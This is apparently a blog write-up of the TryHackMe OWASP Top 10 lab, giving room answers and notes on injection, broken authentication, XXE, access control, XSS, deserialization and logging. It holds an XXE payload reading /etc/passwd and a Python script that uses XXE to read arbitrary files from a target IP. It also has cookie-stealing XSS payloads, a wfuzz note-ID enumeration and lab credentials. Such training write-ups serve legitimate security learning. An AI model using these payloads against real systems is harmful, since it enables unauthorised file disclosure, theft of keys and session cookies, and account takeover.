OWASP Top 10 TryHackMe

[Day 1] Injection

  1. Do a sleep command and measure the time response of the web server
  2. Doing a ping command that will make the vulnerable server ping back to your box
  3. Directing the output (stdout) of a command to a file in a directory that you can control like /var/www/html and try seeing if you can access the file

[Day 2] Broken Authentication

  1. For example a server is vulnerable to SQL Injection meaning an attacker can dump contents of the database that might include password hashes crack them and get access to the system using those credentials
  2. Second scenario is that a user password is weak that by doing a bruteforce attack the password can be easily guessed and this leads to compromising a system
  3. Third scenario is that the web server assigns session id’s that are weak meaning that an attacker by doing a little fuzzing they can be able to reverse the session id and cause him/her to create countless more valid session id’s
  4. And so many more can’t explain all of them for now

[Day 3] Sensitive Data Exposure

sqlitebrowser webapp.db

[Day 4] XML External Entity

  1. Local File Inclusion
  2. Remote Code Execution
  3. Server Side Request Forgery
  4. Cross Site Request Forgery
  5. And many more vulnerabilities
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
/home/user/.ssh/id_rsaexample/home/falcon/.ssh/id_rsa
import requests
import re
import sys
class bcolors:
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
sess = requests.session()
IPAddress = sys.argv[1]
while True:
filename = input(bcolors.OKBLUE + "Enter the name file you want to view > " ) + bcolors.ENDC
payload = """<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file://"""
payload += filename
payload += """ '>]><root>&test;</root>"""
url = "http://" + IPAddress + "/home"
postdata = {
"xxe" : payload
}
output = sess.post(url, data=postdata).text
begin = output.find("</main>")
end = output.find("<center>")
out = output[begin :end]
file = re.sub("</main>", "", out).strip()
print (bcolors.OKGREEN + file + bcolors.ENDC)

[Day 5] Broken Access Control

noot:test1234
  1. A cookie (a unique identifier string used to identify you and give you access to restricted pages )
  2. A session ID or phpsessid which does the same function as a cookie
0 and 1
-c specifies that the output should have colors (since are awesome)--hh tell wfuzz  not to show us pages with 0 characters (this is because if we put a random payload the webpage returns blank)-z range,0-100 wfuzz generate numbers from zero to 100 and the use them as the payload[http://10.10.56.213/note.php?note=FUZZ] finally the URL where we've inserted FUZZ in caps tells wfuzz to put our payload there
  1. index.php
  2. note.php (remember we werenot supposed to be able to view note.php without creds but we are yet we haven’t supplied any credentials)

[Day 6] Security Misconfiguration

1. readme.txt
2. http[s]://url/docs
3. http[s]://url/documentation
4. changelog.txt
5. The good old way online documentation
6. README.md
pensive:PensiveNotes

THE RABBITHOLE

admin:admin
admin:admin
unmodified response
modified response

[Day 7] Cross-site Scripting

hello:hello
<script>alert("Hello")</script>
<script>alert(window.location.hostname)</script>
<b>Coding Rocks</b>
flag
<script>alert(document.cookie)</script>
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

[Day 8] Insecure Deserialization

  1. Python
  2. PHP
  3. Java
  4. NodeJS

Insecure Deserialization cookies

admin:admin

Insecure Deserialization Remote Code Execution

[Day 9] Components with Known Vulnerabilities

[Day 10] Insufficient Logging & Monitoring

  1. logins attempts
  2. password changes
  3. high value transactions
  4. Failed login attempts
  5. HTTP status codes
  6. Time stamps (What page and information was accessed at what time)
  1. By ensuring that all generated logs are stored in a format that can be easily understood and grasped
  2. Ensure high-value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append-only database tables or similar
  3. Ensure all login, access control failures, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis
  4. The application should be able to detect, escalate, or alert for active attacks in real time or near real time

[END]

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store